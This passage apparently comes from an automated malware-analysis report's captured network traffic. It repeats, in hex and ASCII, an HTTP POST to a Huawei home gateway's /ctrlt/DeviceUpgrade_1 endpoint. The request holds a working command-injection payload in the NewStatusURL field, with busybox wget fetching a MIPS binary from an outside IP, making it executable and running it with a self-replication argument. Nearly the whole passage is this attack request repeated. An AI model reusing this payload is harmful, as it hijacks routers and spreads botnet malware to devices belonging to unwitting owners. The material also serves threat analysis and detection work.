6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 